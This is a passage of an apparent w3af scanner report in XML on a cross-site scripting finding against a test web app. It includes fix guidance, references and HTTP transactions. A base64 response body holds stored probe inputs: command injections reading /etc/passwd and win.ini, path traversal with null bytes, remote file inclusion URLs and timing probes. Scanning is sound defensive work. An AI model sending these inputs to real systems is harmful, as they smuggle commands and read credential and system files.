 _Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._</fix-guidance>
        <fix-effort>10</fix-effort>
        <references>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting"/>
            <reference title="Secunia" url="http://secunia.com/advisories/9716/"/>
            <reference title="ha.ckers" url="http://ha.ckers.org/xss.html"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet"/>
        </references>
        <http-transactions>
            <http-transaction id="825">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="33" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT11cng4cSUzQyUyRi0lM0UmcHNldWRvPTU2
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="1175">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0ZShu
ZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmcoImxw
anFpIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNz
d2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4m
Ji9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09UJXdp
bi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
Pnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZU1RF
TVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmluL2Nh
dCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUgJVNZ
U1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3aW4u
aW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjE5NTQ4Nzg1PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9w
YXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vZXRj
L3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+QzoIb290
LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3Qu
aW5pAC5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkM6CG9vdC5pbmkALmh0bWw8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+OTQwNzM0MzE8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD4lU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkA
Lmh0bWw8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaQAuaHRtbDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cGluZyAtbiA0IGxvY2FsaG9zdDwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5hKS8p
LykvKS8pLykvKS8pLykvKS8pLykvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmEpLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLzwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD4yQ25MT2YyRTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5oVHRwOi8vdzNh
Zi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmhUdHA6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+aHRUcHM6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aHRUcHM6
Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+ZlRwOi8vdzNhZi5vcmcv
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPmZUcDovL3czYWYub3JnLzwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD4lbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lbjwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4lbiVuJW4lbjwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4lbiVuJW4lbjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+XigjJCFAIyQp
KCgpKSkqKioqKio8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+XigjJCFAIyQpKCgpKSkqKioqKio8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+aHR0cDovL3d3dy53M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
Ly93M2FmLm9yZzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vL3czYWYub3JnPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlM4eDZITEJjPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjwhLS08L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+PCEtLTwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD5waW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD51amtlbzwvLT48L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NzZ1Mmtg
NzZ1Mms8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+MjJyNWoiMjJyNWo8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+MzZ4YXkgPTwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD53NGxvNi8qPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiI8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Ijwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5pRG9udEV4aXN0
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmlEb250RXhpc3Q8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5z
bGVlcCgzKTs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+c2xlZXAoMyk7PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPnczYWYNCnZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD53M2FmDQp2dWxuZXJhYmxlMDczYjogYWU1PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnczYWYNdnVsbmVyYWJsZTA3
M2I6IGFlNWM8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dzNhZg12dWxuZXJhYmxlMDczYjogYWU1Y3czYWY8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZgp2dWxuZXJhYmxlMDczYjogYWU1Yzwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD53M2FmCnZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD5odHRwOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+aHR0cDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnczYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPnczYWYub3JnL3JmaS5odG1s
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmhUdFA6Ly93M2FmLm9yZy9yZmkuaHRtbDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5oVHRQOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dXJ4OHE8Ly0+PC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjZ5eWpiIjZ5eWpiPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmt1dWh1Lyo8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+bm5zYjRgbm5zYjQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Z21tMzUgPTwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBX
b3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4vdXNyL3NiaW4vcGluZyAtcyBs
b2NhbGhvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtbiA0IGxvY2FsaG9zdDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5UaHJlYWQuc2xlZXAoMzAwMCk7PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlRocmVhZC5zbGVl
cCgzMDAwKTs8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
